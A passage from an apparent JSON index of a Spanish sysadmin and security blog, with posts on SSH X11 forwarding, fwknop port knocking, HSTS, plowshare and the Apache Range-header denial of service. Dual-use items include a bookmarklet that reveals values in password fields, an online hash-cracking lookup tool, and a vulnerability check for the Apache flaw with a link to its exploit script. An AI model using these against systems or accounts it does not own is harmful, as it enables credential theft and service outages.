contiene.\n","permalink":"http://karpoke.ignaciocano.com/2011/09/30/encuentra-el-hash/","summary":"\u003cp\u003eExisten herramientas que permiten romper un \u003cem\u003ehash\u003c/em\u003e, aunque a veces puede\nahorrar tiempo y recursos \u003ca href=\"http://www.pentestit.com/findmyhash/\"\u003ebuscar si el \u003cem\u003ehash\u003c/em\u003e ya ha sido encontrado\u003c/a\u003e.\nNi siquiera hace falta una \u003cem\u003erainbow table\u003c/em\u003e.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003efindmyhash\u003c/code\u003e es un \u003cem\u003escript\u003c/em\u003e escrito en Python que puede buscar\ndiferentes tipos de \u003cem\u003ehash\u003c/em\u003e en diferentes servicios de \u003cem\u003ecracking online\u003c/em\u003e.\nLos algoritmos soportados son los siguientes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMD4\u003c/li\u003e\n\u003cli\u003eMD5\u003c/li\u003e\n\u003cli\u003eSHA1\u003c/li\u003e\n\u003cli\u003eSHA256\u003c/li\u003e\n\u003cli\u003eRMD160\u003c/li\u003e\n\u003cli\u003eMYSQL\u003c/li\u003e\n\u003cli\u003eCISCO7\u003c/li\u003e\n\u003cli\u003eLM\u003c/li\u003e\n\u003cli\u003eNTLM\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eUn ejemplo sencillo. Si no encuentra el \u003cem\u003ehash\u003c/em\u003e, también lo buscará en\nGoogle:\u003c/p\u003e","title":"Encuentra el hash"},{"content":"Desde hace un tiempo, parece que Twitter ha ido ocultando la posibilidad de seguir una cuenta a través de RSS. Han aparecido algunos servicios que intentan corregir este comportamiento, aunque realmente no son necesarios.\nPara seguir a un usuario a través del RSS lo único que tenemos que hacer es eliminar el shebang de la URL, es decir, el #!. Por ejemplo, para seguir a DragonJAR, muy recomendable, deberíamos usar la URL: http://twitter.com/DragonJAR, en lugar de http://twitter.com/#!/DragonJAR.\nSi ponemos esa URL en un navegador, nos redirecciona a la URL con el shebang, pero si la descargamos, podemos ver que ahí están definidos los enlaces a los RSS de los tweets del usuario y de sus favoritos:\n$ curl -s http://twitter.com/DragonJAR | grep link.*rss+xml ","permalink":"http://karpoke.ignaciocano.com/2011/09/30/twitter-y-el-rss-de-las-cuentas-de-usuario/","summary":"\u003cp\u003eDesde hace un tiempo, parece que Twitter ha ido \u003ca href=\"http://www.genbeta.com/sindicacion/facebook-y-twitter-eliminan-silenciosamente-sus-canales-de-suscripcion-rss#\"\u003eocultando la\nposibilidad de seguir una cuenta a través de RSS\u003c/a\u003e. Han aparecido\nalgunos \u003ca href=\"http://www.genbeta.com/sindicacion/sigue-cuentas-de-twitter-en-tu-lector-de-feeds-con-twitter-to-rss\"\u003eservicios que intentan corregir este comportamiento\u003c/a\u003e, aunque\nrealmente no son necesarios.\u003c/p\u003e\n\u003cp\u003ePara seguir a un usuario a través del RSS lo único que tenemos que hacer\nes eliminar el \u003cem\u003e\u003ca href=\"http://en.wikipedia.org/wiki/Shebang_(Unix)\"\u003eshebang\u003c/a\u003e\u003c/em\u003e de la URL, es decir, el \u003ccode\u003e#!\u003c/code\u003e. Por ejemplo,\npara seguir a \u003ca href=\"http://www.dragonjar.org/\"\u003eDragonJAR\u003c/a\u003e, muy recomendable, deberíamos usar la URL:\n\u003ca href=\"http://twitter.com/DragonJAR\"\u003ehttp://twitter.com/DragonJAR\u003c/a\u003e, en lugar de\n\u003ca href=\"http://twitter.com/#!/DragonJAR\"\u003ehttp://twitter.com/#!/DragonJAR\u003c/a\u003e.\u003c/p\u003e","title":"Twitter y el RSS de las cuentas de usuario"},{"content":"Si tenemos acceso por SSH a otro ordenador, ambos con entorno gráfico, podemos redirigir la pantalla, el teclado y el ratón en ambos sentidos, es decir, podemos conseguir cosas como:\n» aplicaciones remotas que se muestren en nuestro equipo » aplicaciones remotas que se muestren en el equipo remoto » aplicaciones locales que se muestren en el equipo remoto » recibir una captura de pantalla del equipo remoto » [enviar una captura de pantalla de nuestro equipo al equipo\nremoto][] » mostrar una imagen remota en nuestro equipo » mostrar una imagen local en el equipo remoto\nAplicaciones remotas en el servidor gráfico local Si queremos que un programa de un equipo remoto se ejecute en el servidor gráfico de nuestro equipo, una de las cosas que podemos hacer es configurar el servidor SSH del equipo remoto para que acepte el reenvío X11, o X11 Forwarding. De esta forma la conexión va cifrada y, además, tampoco debemos preocuparnos por el valor de la variable de entorno DISPLAY. Para que el servidor SSH permita el reenvío X11, deberemos asegurarnos de que en el archivo de configuración /etc/ssh/sshd_config aparece lo siguiente:\nX11Forwarding yes Si no estuviera, lo añadimos y reiniciamos el servicio. Ahora, iniciaremos una conexión SSH desde el cliente, utilizando el argumento -X de ssh:\n$ ssh -C -X user@remotehost El argumento -X permite reenviar el terminal gráfico. Se debe utilizar con cuidado, tal como lo indican en la página del manual. Un usuario del equipo remoto que pueda saltarse los permisos de archivo (para la base de datos de usuarios autorizados del servidor X) podría acceder al terminal gráfico de nuestro equipo a través de la conexión reenviada. Un atacante podría realizar acciones como por ejemplo monitorizar las pulsaciones de teclado. Por este motivo, el reenvío X11 está sujeto a varias restricciones por defecto según la política de seguridad de X11. Utilizando el argumento -Y se confía en el equipo remoto y no se llevan a cabo los controles ni se aplican estas restricciones.\nCuando ejecutemos una aplicación con interfaz gráfica, ésta se abrirá en nuestro equipo.\nremotehost$ xeyes \u0026amp; Aplicaciones remotas en el servidor gráfico remoto Si lo que queremos es abrir un programa con interfaz gráfica del equipo remoto, pero esta vez en el servidor gráfico del equipo remoto, no es necesario recurrir al reenvío X11. Lo único que hay que hacer, una vez iniciada la sesión en el equipo remoto, es modificar el valor de la variable de entorno DISPLAY:\nremotehost$ export DISPLAY=:0 Cuando lancemos una aplicación con interfaz gráfica instalada en el equipo remoto, ésta se abrirá en el servidor gráfico del equipo remoto.\nEn lugar de exportar la variable, podemos definirla únicamente para una aplicación en concreto:\n$ DISPLAY=:0 xterm Aplicaciones gráficas locales en el entorno gráfico remoto Podemos utilizar lo visto en los dos casos anteriores para conseguir que una aplicación de nuestro equipo se ejecute en el servidor gráfico remoto a través de SSH. Necesitaremos tener un servidor SSH corriendo en nuestro equipo.\nPrimero, establecemos un túnel inverso entre nuestro equipo y el equipo remoto. Esto quiere decir que se creará una redirección en el puerto 8000 del equipo remoto al servidor SSH de nuestro equipo.\n$ ssh -R 8000:localhost:22 remoteuser@remotehost Una vez iniciada esta conexión, modificaremos el valor de la variable DISPLAY y nos conectaremos al puerto local 8000 que redirige a nuestro equipo:\nremotehost$ DISPLAY=:0 ssh -C -X -p8000 user@localhost Cuando hayamos iniciado sesión en nuestro equipo será como tener otro terminal abierto, sólo que las aplicaciones que ejecutemos en éste se mostrarán en el equipo remoto.\nEn esta página podemos encontrar una comparativa del consumo de ancho de banda de diferentes programas a través del túnel seguro.\nObtener una captura del escritorio remoto Si lo que queremos es hacer una captura del escritorio del equipo remoto, podemos utilizar el comando import:\n$ ssh -C user@remotehost \u0026#34;DISPLAY=:0.0 import -window root -format png -\u0026#34; | display -format png - En lugar de visualizarla directamente, podríamos guardarla en el equipo remoto y luego copiar las capturas con scp.\nOtro comando sería scrot, disponible en los repositorios:\n$ ssh -C user@remotehost \u0026#34;DISPLAY=:0.0 scrot -z - | display - Si está puesto el protector de pantalla, por ejemplo, si la captura sale en negro, deberemos matar el proceso para poder ver el escritorio.\n$ ssh user@remotehost \u0026#34;pkill gnome-screensaver\u0026#34; Mostrar una captura de nuestro escritorio en el equipo remoto El caso contrario al anterior.\n$ import -window root -format png - | ssh -C user@remotehost \u0026#34;DISPLAY=:0.0 display -format png -\u0026#34; Otra forma sería guardar la captura en un fichero, enviarlo y luego abrir una aplicación en el equipo remoto:\n$ import -window root -format png screenshot.png $ scp screenshot.png user@remotehost:~ $ ssh user@remotehost \u0026#34;DISPLAY=:0 eog screenshot.png\u0026#34; Mostrar imágenes del equipo remoto De la misma forma que realizamos una captura, podemos enviarnos una imagen y visualizarla directamente:\n$ ssh -C user@remotehost \u0026#34;cat screenshot.png\u0026#34; | display -format png - Mostrar imágenes de nuestro equipo en el equipo remoto Podemos conseguir que se habrá una aplicación remota que muestre una imagen de nuestro equipo:\n$ cat screenshot.png | ssh -C user@remotehost \u0026#34;DISPLAY=:0 display -format png -\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2011/09/28/imagen-a-traves-de-ssh/","summary":"\u003cp\u003eSi tenemos acceso por SSH a otro ordenador, ambos con entorno gráfico,\npodemos redirigir la pantalla, el teclado y el ratón en ambos sentidos,\nes decir, podemos conseguir cosas como:\u003c/p\u003e\n\u003cp\u003e» \u003ca href=\"#aplicaciones-remotas-a-servidor-local\"\u003eaplicaciones remotas que se muestren en nuestro equipo\u003c/a\u003e\n» \u003ca href=\"#aplicaciones-remotas-a-servidor-remoto\"\u003eaplicaciones remotas que se muestren en el equipo remoto\u003c/a\u003e\n» \u003ca href=\"#aplicaciones-locales-a-servidor-remoto\"\u003eaplicaciones locales que se muestren en el equipo remoto\u003c/a\u003e\n» \u003ca href=\"#captura-escritorio-remoto-a-local\"\u003erecibir una captura de pantalla del equipo remoto\u003c/a\u003e\n» [enviar una captura de pantalla de nuestro equipo al equipo\u003c/p\u003e","title":"Imagen a través de SSH"},{"content":"plowshare es una herramienta diseñada para descargar y subir ficheros a los sitios de intercambio de ficheros más populares. También se pueden administrar directorios remotos y borrar enlaces.\nInstalación Primero, instalamos las dependencias:\n$ sudo aptitude install curl recode imagemagick tesseract-ocr-eng spidermonkey-bin rhino perlmagick aview Podemos descargar el código fuente desde el repositorio Git, en un tarball o en un paquete .deb:\n$ wget https://plowshare.googlecode.com/files/plowshare_1%7Egit20110914-1_all.deb $ sudo dpkg -i plowshare_1~git20110914-1_all.deb Descargando Para descargar un enlace de Megaupload, por ejemplo, escribimos:\n$ plowdown megaupload -a freeuser:password http://www.megaupload.com/?d=7V4SDTC7 También podemos pasarle un fichero que contenga los enlaces:\n$ plowdown links.txt Incluye un módulo de reconocimiento de caracteres que, para el caso de Megaupload, funciona perfectamente, por lo que no deberemos preocuparnos de tener que introducir los caracteres de ningún captcha. Si no pudiera leer el captcha, nos aparecerá una ventana mostrándonos dicho captcha y un campo de texto para que introduzcamos el contenido.\nActualizado el 9 de diciembre de 2016 A estas alturas, hace tiempo que Megaupload desapareció y, algo más tarde, apareció en su lugar Mega. plowshare también se ha renovado, por ejemplo lo podemos utilizar para descargar de zippyshare, e incluye plowdown, una herramienta que facilita la actualización del programa así como la instalación de módulos. Uno de estos módulos es el que necesitaremos si queremos descargar archivos de Mega, de lo contrario, nos aparecerá un mensaje parecido al siguiente:\n$ plowdown \u0026#39;https://mega.nz/#!3tNDHTAT!ZzWFe-rkF-Tli0o7qoEbbyQcO57FRrmErlu5J5jIEEA\u0026#39; No module found, try simple redirection Skip: no module for URL (https://mega.nz) La instalación de dicho módulo es muy sencilla:\n$ plowmod -i https://github.com/mcrapet/plowshare-module-mega.git $ cd ~/.config/plowshare/modules.d/mega.git $ ./autogen.sh $ ./configure --enable-local $ make Ahora ya sí que podremos descargar de Mega sin problemas.\nPara mantener tanto la herramienta como los módulos actdualizados, basta ejecutar:\n$ plowdown -u ","permalink":"http://karpoke.ignaciocano.com/2011/09/18/descargar-archivos-de-megaupload-desde-el-terminal-con-plowshare/","summary":"\u003cp\u003e\u003ca href=\"http://code.google.com/p/plowshare/\"\u003eplowshare\u003c/a\u003e es una herramienta diseñada para descargar y subir\nficheros a los sitios de intercambio de ficheros más populares. También\nse pueden administrar directorios remotos y borrar enlaces.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003ePrimero, instalamos las dependencias:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install curl recode imagemagick tesseract-ocr-eng spidermonkey-bin rhino perlmagick aview\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePodemos descargar el código fuente desde el repositorio Git, en un\n\u003cem\u003etarball\u003c/em\u003e o en un paquete \u003ccode\u003e.deb\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ wget https://plowshare.googlecode.com/files/plowshare_1%7Egit20110914-1_all.deb\n$ sudo dpkg -i plowshare_1~git20110914-1_all.deb\n\u003c/code\u003e\u003c/pre\u003e\u003ch2 id=\"descargando\"\u003eDescargando\u003c/h2\u003e\n\u003cp\u003ePara descargar un enlace de Megaupload, por ejemplo, escribimos:\u003c/p\u003e","title":"Descargar archivos de Megaupload desde el terminal con plowshare"},{"content":"fwknop implementa un esquema de autorización llamado Single Packet Authorization (SPA). Mediante SPA necesita un único paquete cifrado para abrir puertos en el cortafuegos o llevar a cabo acciones en el sistema. Se utiliza en conjunción con un cortafuegos que impide la conexión a los puertos de los servicios que queremos proteger. De esta forma, se logra una capa extra de seguridad, ya que los hace permanecer invisibles, descartando silenciosamente los paquetes que llegan a dicho puerto. Para poder tener acceso a los servicios protegidos, la parte servidor de fwknop esnifa pasivamente los paquetes que llegan al servidor usando libpcap y, en caso de recibir de parte del cliente de fwknop un paquete cifrado válido que no ha sido recibido antes, se permite el acceso a través del cortafuegos.\nSPA tiene los beneficios del port knocking, es decir, la protección de un servicio tras un filtro que descarta los paquetes por defecto, pero con las siguientes ventajas:\npuede utilizar cifrado asimétrico. Port knocking utiliza únicamente las cabeceras de los paquetes, las cuales no suelen ser suficientes para guardar una clave de cifrado asimétrico, que suelen tener una longitud mayor que la de una clave de cifrado simétrico los paquetes no se pueden reenviar. En port knocking hay estrategias para reducir el riesgo de reutilizar un paquete, pero no son fácilmente escalables cuando se tienen muchos usuarios. SPA no se puede romper con ataques triviales para averiguar la secuencia. Un atacante monitorizando la red podría averiguar la secuencia utilizada por _port knocking_, simplemente encontrando un paquete duplicado (que venga de una secuencia real) a un puerto anterior de la secuencia SPA sólo envía un paquete, por lo que es más rápido y para alguien que estuviera monitorizando no aparece como un escaneo de puertos. _Port knocking_ necesita un retardo de tiempo entre paquetes sucesivos porque la entrega en orden no está garantizada Instalación de fwknop en Ubuntu En el servidor Instalamos fwknop-server y libpcap en el servidor:\n$ sudo aptitude install fwknop-server libpcap-dev Nos hará unas preguntas:\nConfigure fwknop to protect the SSH port? Yes Sniffing interface: eth0 Encryption key to use: __********__ Utilizando claves GPG Esta clave que nos pide es para usar el algoritmo simétrico Rijndael, o AES. Si queremos utilizar cifrado asimétrico, podemos utilizar GnuPG.\nPara crear las claves GnuPG, lo hacemos directamente como el usuario root, no con sudo:\n$ sudo su # gpg --gen-key - RSA y RSA # RSA para firmar y cifrar - 2048 bits # longitud de la clave - 1y # la clave caducará en un año Cuando terminen de crearse el par de claves, mostrará algo como lo siguiente:\npub 2048R/4A064F2A 2011-09-17 [[caduca: 2012-09-16]] Huella de clave = 0CCD D9F5 1F77 E316 2B2B 0062 0C6E B0E6 4A06 4F2A uid Server sub 2048R/38F4A4A8 2011-09-17 [[caduca: 2012-09-16]] Exportamos la clave a un fichero:\n# gpg -a --export 4A064F2A \u0026gt; fwknop-server.asc Generando entropía Si nos aparece el mensaje:\nEs necesario generar muchos bytes aleatorios. Es una buena idea realizar alguna otra tarea (trabajar en otra ventana/consola, mover el ratón, usar la red y los discos) durante la generación de números primos. Esto da al generador de números aleatorios mayor oportunidad de recoger suficiente entropía. No hay suficientes bytes aleatorios disponibles. Por favor, haga algún otro trabajo para que el sistema pueda recolectar más entropía (se necesitan 92 bytes más). Poniendo a trabajar el servidor podría servir para crear entropía. Algo como:\n# ls -lRh / # find / -name \\* El paquete rng-tools ayuda a generar entropía. Una vez instalado desde los respositorios, modificamos el fichero /etc/default/rng-tools para que contenga:\nHRNGDEVICE=/dev/urandom Y reiniciamos el servicio:\n$ sudo service rng-tools restart En el cliente Si vamos a utilizar cifrado asimétrico, también deberemos generar el par de claves en el cliente:\n$ gpg --gen-key pub 2048R/723B172D 2011-09-17 [[caduca: 2012-09-16]] Huella de clave = 7EB6 CFC6 6617 6354 A2A1 2BBF FD15 D606 723B 172D uid Client sub 2048R/3482560E 2011-09-17 [[caduca: 2012-09-16]] Exportamos la clave:\n$ gpg -a --export 723B172D \u0026gt; fwknop-client.asc Copiamos la clave que hemos exportado en el servidor al cliente, para firmar la clave del cliente con la del servidor.\n$ scp remotehost:~/fwknop-server.asc . Importamos la clave del servidor:\n$ gpg --import fwknop-server.asc gpg: clave 4A064F2A: clave pública \u0026#34;Server \u0026#34; importada gpg: Cantidad total procesada: 1 gpg: importadas: 1 (RSA: 1) Y la firmamos con la nuestra. Nos pedirá la contraseña:\n$ gpg --sign-key server@localhost pub 2048R/4A064F2A creado: 2011-09-17 [caduca: 2012-09-16] uso: SC confianza: desconocido validez: desconocido sub 2048R/38F4A4A8 creado: 2011-09-17 [caduca: 2012-09-16] uso: E desconocido (1). Server pub 2048R/4A064F2A creado: 2011-09-17 [caduca: 2012-09-16] uso: SC confianza: desconocido validez: desconocido Huella de clave primaria: 0CCD D9F5 1F77 E316 2B2B 0062 0C6E B0E6 4A06 4F2A Server Esta clave expirará el 2012-09-16. ¿Está realmente seguro de querer firmar esta clave con su clave: \u0026#34;Client \u0026#34; (723B172D)? ¿Firmar de verdad? (s/N) s Necesita una frase contraseña para desbloquear la clave secreta del usuario: \u0026#34;Client \u0026#34; clave RSA de 2048 bits, ID 723B172D, creada el 2011-09-17 Ahora lo haremos a la inversa. Copiamos nuestra clave (cliente) al servidor, para poder firmarla después con la del servidor.\n$ scp fwknop-client.asc remotehost:~ fwknop con claves GPG Estando en el servidor, y habiendo copiado la clave desde el cliente, la importamos. Una vez más, nos pedirá la contraseña:\n# gpg --import fwknop-client.asc gpg: clave 723B172D: clave pública \u0026#34;Client \u0026#34; importada gpg: Cantidad total procesada: 1 gpg: importadas: 1 (RSA: 1) Firmamos la clave del cliente con la del servidor:\n# gpg --sign-key client@localhost pub 2048R/723B172D creado: 2011-09-17 [caduca: 2012-09-16] uso: SC confianza: desconocido validez: desconocido sub 2048R/3482560E creado: 2011-09-17 [caduca: 2012-09-16] uso: E desconocido (1). Client pub 2048R/723B172D creado: 2011-09-17 [caduca: 2012-09-16] uso: SC confianza: desconocido validez: desconocido Huella de clave primaria: 7EB6 CFC6 6617 6354 A2A1 2BBF FD15 D606 723B 172D Client Esta clave expirará el 2012-09-16. ¿Está realmente seguro de querer firmar esta clave con su clave: \u0026#34;Server \u0026#34; (4A064F2A)? ¿Firmar de verdad? (s/N) s Necesita una frase contraseña para desbloquear la clave secreta del usuario: \u0026#34;Server \u0026#34; clave RSA de 2048 bits, ID 4A064F2A, creada el 2011-09-17 gpg: el agente gpg no esta disponible en esta sesión El agente gpg es un programa que se encarga de gestionar un almacén temporal de claves seguro. Sirve para no tener que introducir la frase de paso para la clave privada cada vez que la queramos utilizar en la misma sesión. Si no queremos que nos vuelva a salir ese aviso, o si no lo vamos a usar, podemos desinstalarlo:\n$ sudo aptitude purge gnupg-agent Ahora sólo queda modificar la configuración de acceso en el fichero /etc/fwknop/access.conf:\nSOURCE: ANY; OPEN_PORTS: tcp/22; DATA_COLLECT_MODE: PCAP; # si no queremos utilizar cifrado simétrico, comentamos la siguiente línea #KEY: myPassword GPG_HOME_DIR: /root/.gnupg; GPG_DECRYPT_ID: 4A064F2A; GPG_DECRYPT_PW: password para la clave; GPG_REMOTE_ID: 723B172D; FW_ACCESS_TIMEOUT: 30; Y reiniciamos el servicio:\n$ sudo service fwknop-service restart Otra vez al cliente Instalamos fwknop-client en el cliente:\n$ sudo aptitude install fwknop-client Ya podemos probar a conectarnos. Primero, probamos la conexión por cifrado simétrico:\n$ fwknop -A \u0026#39;tcp/22\u0026#39; -s -D 192.168.0.30 [+] Starting fwknop client (SPA mode)... [+] Enter an encryption key. This key must match a key in the file /etc/fwknop/access.conf on the remote system. Encryption Key: [+] Building encrypted Single Packet Authorization (SPA) message... [+] Packet fields: Random data: 8324045518684247 Username: karpoke Timestamp: 1316296897 Version: 1.9.12 Type: 1 (access mode) Access: 0.0.0.0,tcp/22 SHA256 digest: Lk3XUmw7PUd3OEOAb7mzb1kB+0CTTNzDyMrNdYK0YVo [+] Sending 182 byte message to 192.168.0.30 over udp/62201... En el servidor, en los ficheros de log, por ejemplo en /var/log/messages, veremos algo como:\nSep 18 00:01:37 server fwknopd: received valid Rijndael encrypted packet from: 192.168.0.100, remote user: karpoke, client version: 1.9.12 (SOURCE line num: 26) Sep 18 00:01:37 server fwknopd: add FWKNOP_INPUT 192.168.0.100 -\u0026gt; 0.0.0.0/0(tcp/22) ACCEPT rule 30 sec Sep 18 00:02:08 server fwknop(knoptm): removed iptables FWKNOP_INPUT ACCEPT rule for 192.168.0.100 -\u0026gt; 0.0.0.0/0(tcp/22), 30 sec timeout exceeded Si queremos utilizar la autenticación mediante la clave GPG:\n$ fwknop -A \u0026#39;tcp/22\u0026#39; -s -D 192.168.0.30 --gpg-recip 4A064F2A --gpg-sign 723B172D Para conectarnos desde fuera de la red, debemos utilizar el argumento -w. Con este flag, el comando realiza una petición a whatismyip.com y utiliza esa IP. De lo contrario, estaríamos enviado nuestra IP interna y sería esa IP la que se utilizaría para crear la regla en el cortafuegos del servidor:\n$ fwknop -A \u0026#39;tcp/22\u0026#39; -s -w -D 192.168.0.30 --gpg-recip 4A064F2A --gpg-sign 723B172D O podemos enviar la IP mediante el argumento -a:\n$ fwknop -A \u0026#39;tcp/22\u0026#39; -s -a 1.2.3.4 -D 192.168.0.30 --gpg-recip 4A064F2A --gpg-sign 723B172D El cortafuegos Después de 30 segundos se elimina la regla que permite la conexión con el puerto. Si sucede que la conexión se corta cuando fwknop elimina la regla, podemos añadir una nueva regla que mantenga las conexiones que ya estuvieran establecidas:\n$ sudo iptables -A INPUT -p tcp -i eth0 -m state --state ESTABLISHED, RELATED -j ACCEPT Más información » fwknop » Single Packet Authorization » Single Packet Authorization in Ubuntu » GPG Howto » fwknopping your way to success with single packet authorisation » SPA, Single Packet Authorization » Port knocking, ofuscación o capa de seguridad?\n","permalink":"http://karpoke.ignaciocano.com/2011/09/18/fwknop-single-packet-authorization-y-port-knocking/","summary":"\u003cp\u003e\u003ccode\u003efwknop\u003c/code\u003e implementa un esquema de autorización llamado \u003cem\u003eSingle Packet\nAuthorization (SPA)\u003c/em\u003e. Mediante SPA necesita un único paquete cifrado\npara abrir puertos en el cortafuegos o llevar a cabo acciones en el\nsistema. Se utiliza en conjunción con un cortafuegos que impide la\nconexión a los puertos de los servicios que queremos proteger. De esta\nforma, se logra una capa extra de seguridad, ya que los hace permanecer\ninvisibles, descartando silenciosamente los paquetes que llegan a dicho\npuerto. Para poder tener acceso a los servicios protegidos, la parte\nservidor de \u003ccode\u003efwknop\u003c/code\u003e esnifa pasivamente los paquetes que llegan al\nservidor usando \u003ccode\u003elibpcap\u003c/code\u003e y, en caso de recibir de parte del cliente de\n\u003ccode\u003efwknop\u003c/code\u003e un paquete cifrado válido que no ha sido recibido antes, se\npermite el acceso a través del cortafuegos.\u003c/p\u003e","title":"fwknop: Single Packet Authorization y port knocking"},{"content":"Si nos encontramos un formulario web lleno de asteriscos, podemos obtener lo que hay realmente escrito pegando lo siguiente en la barra de direcciones:\njavascript:(function(){var s,F,j,f,i; s = \u0026#34;\u0026#34;; F = document.forms; for(j=0; j \u0026lt; f.length; ++j) { f = F[j]; for (i=0; i \u0026lt; f.length; ++i) { if (f[i].type.toLowerCase() == \u0026#34;password\u0026#34;) s += f[i].value + \u0026#34; \u0026#34;; } } if (s) alert(\u0026#34;Passwords in forms on this page: \u0026#34; + s); else alert(\u0026#34;There are no passwords in forms on this page.\u0026#34;);})(); ","permalink":"http://karpoke.ignaciocano.com/2011/09/11/obtener-la-contrasena-a-partir-de-los-asteriscos-de-un-formulario-web/","summary":"\u003cp\u003eSi nos encontramos un formulario web lleno de asteriscos, podemos\nobtener lo que hay realmente escrito pegando lo siguiente en la barra de\ndirecciones:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ejavascript:(function(){var s,F,j,f,i; s = \u0026#34;\u0026#34;; F = document.forms; for(j=0; j \u0026lt; f.length; ++j) { f = F[j]; for (i=0; i \u0026lt; f.length; ++i) { if (f[i].type.toLowerCase() == \u0026#34;password\u0026#34;) s += f[i].value + \u0026#34; \u0026#34;; } } if (s) alert(\u0026#34;Passwords in forms on this page: \u0026#34; + s); else alert(\u0026#34;There are no passwords in forms on this page.\u0026#34;);})();\n\u003c/code\u003e\u003c/pre\u003e","title":"Obtener la contraseña a partir de los asteriscos de un formulario web"},{"content":"HTTP Strict Transport Security (HSTS) es un mecanismo de seguridad web donde el servidor exige que las conexiones se realicen únicamente mediante conexiones seguras. El servidor informa de esta política de seguridad utilizando la cabecera Strict-Transport-Security, en donde se especifica el periodo durante el cual las conexiones seguras son obligatorias.\nSi una web proporciona acceso seguro (HTTPS) pero accedemos de forma no segura (HTTP) podría suceder que nos redirija a la versión segura, sin embargo, ya se había iniciado una conversación sin cifrar. Este comportamiento puede ser explotado por un ataque Man-In-The-Middle.\nLa política de seguridad HSTS pretende evitar este tipo de ataques, impidiendo que se realice ninguna conexión que no sea segura. La cabecera no se envía durante una transacción HTTP no cifrada dado que el User-Agent no sabe si HTTPS está disponible y porque podría haber sido inyectada por un atacante.\nConfiguración en Apache En Apache, además de tener habilitado mod_headers, deberemos introducir la siguiente línea allí donde configuramos la conexión SSL. Por ejemplo, tras el DocumentRoot del VirtualHost seguro por defecto en el archivo /etc/apache2/sites-enabled/default-ssl:\nHeader add Strict-Transport-Security \u0026#34;max-age=15768000\u0026#34; El atributo max-age especifica el tiempo durante el cual las conexiones seguras serán obligatorias. También se puede añadir el atributo includeSubDomains para incluir todos los subdominios:\nHeader add Strict-Transport-Security \u0026#34;max-age=15768000; includeSubDomains\u0026#34; WordPress, por ejemplo, tiene una directiva para conseguir que la conexión al panel de control se haga a través de una conexión segura. Pero es posible que en otros casos sigamos necesitando una redirección hacia la versión segura de la página, que podemos conseguir mediante mod_rewrite:\n\u0026lt;IfModule mod_rewrite.c\u0026gt; RewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} \u0026lt;/IfModule\u0026gt; ","permalink":"http://karpoke.ignaciocano.com/2011/09/11/http-strict-transport-security/","summary":"\u003cp\u003e\u003ca href=\"http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\"\u003eHTTP Strict Transport Security\u003c/a\u003e (HSTS) es un mecanismo de seguridad\nweb donde el servidor exige que las conexiones se realicen únicamente\nmediante conexiones seguras. El servidor informa de esta política de\nseguridad utilizando la cabecera \u003ccode\u003eStrict-Transport-Security\u003c/code\u003e, en donde\nse especifica el periodo durante el cual las conexiones seguras son\nobligatorias.\u003c/p\u003e\n\u003cp\u003eSi una web proporciona acceso seguro (HTTPS) pero accedemos de forma no\nsegura (HTTP) \u003ca href=\"http://hacks.mozilla.org/2010/08/firefox-4-http-strict-transport-security-force-https/\"\u003epodría suceder que nos redirija a la versión segura\u003c/a\u003e,\nsin embargo, ya se había iniciado una conversación sin cifrar. Este\ncomportamiento puede ser explotado por un ataque \u003cem\u003eMan-In-The-Middle\u003c/em\u003e.\u003c/p\u003e","title":"HTTP Strict Transport Security"},{"content":"Una vulnerabilidad descubierta por kingcope permite que los servidores Apache vulnerables sean susceptibles de sufrir una denegación de servicio.\nLa vulnerabilidad se encuentra en el uso de la cabecera Range. Esta cabecera se utiliza para obtener sólo una parte de la página. Si se solicitan varias partes además de pedir que la respuesta se comprima, mediante la cabecera Accept-Encoding: gzip, se dispara el consumo de procesador y memoria.\nExiste un script que permite comprobar si el servidor es vulnerable y, si es el caso, explotar dicha vulnerabilidad.\nPara comprobar si un servidor es vulnerable, podemos ejecutar:\n$ telnet 127.0.0.1 80 HEAD / HTTP/1.1 Host: 127.0.0.1 Range: bytes=0-5 Accept-Encoding: gzip Connection: close Si la respuesta es un código 206 Partial Content el servidor es vulnerable:\nHTTP/1.1 206 Partial Content Date: Wed, 31 Aug 2011 11:52:13 GMT Server: Apache/2.2.17 (Ubuntu) Vary: Accept-Encoding Content-Encoding: gzip Content-Range: bytes 0-5/20 Content-Length: 6 Connection: close Content-Type: text/html;charset=UTF-8 Protección Si tenemos un servidor vulnerable, podemos adoptar alguna de las siguientes medidas de protección.\nPodemos deshabilitar la cabecera Range mediante la directiva `RequestHeader`, usando el módulo `mod_headers`: RequestHeader unset Range Limitar el número de intervalos mediante mod_rewrite: RewriteEngine On RewriteCond %{HTTP:Range} ([0-9]_-[0-9]_)(\\s*,\\s*[0-9]_-[0-9]_)+ RewriteRule .* - [NS,L,F] Deshabilitar el módulo mod_deflate: $ sudo a2dismod deflate ","permalink":"http://karpoke.ignaciocano.com/2011/08/31/denegacion-de-servicio-en-apache-utilizando-la-cabecera-range/","summary":"\u003cp\u003eUna \u003ca href=\"http://issues.apache.org/bugzilla/show_bug.cgi?id=51714\"\u003evulnerabilidad descubierta por \u003cem\u003ekingcope\u003c/em\u003e\u003c/a\u003e permite que los\nservidores Apache vulnerables sean susceptibles de sufrir una denegación\nde servicio.\u003c/p\u003e\n\u003cp\u003eLa vulnerabilidad se encuentra en el uso de la cabecera \u003ccode\u003eRange\u003c/code\u003e. Esta\ncabecera se utiliza para obtener sólo una parte de la página. Si se\nsolicitan varias partes además de pedir que la respuesta se comprima,\nmediante la cabecera \u003ccode\u003eAccept-Encoding: gzip\u003c/code\u003e, se dispara el consumo de\nprocesador y memoria.\u003c/p\u003e\n\u003cp\u003eExiste un \u003ca href=\"http://seclists.org/fulldisclosure/2011/Aug/att-175/killapache_pl.bin\"\u003e\u003cem\u003escript\u003c/em\u003e\u003c/a\u003e que permite comprobar si el servidor es\nvulnerable y, si es el caso, 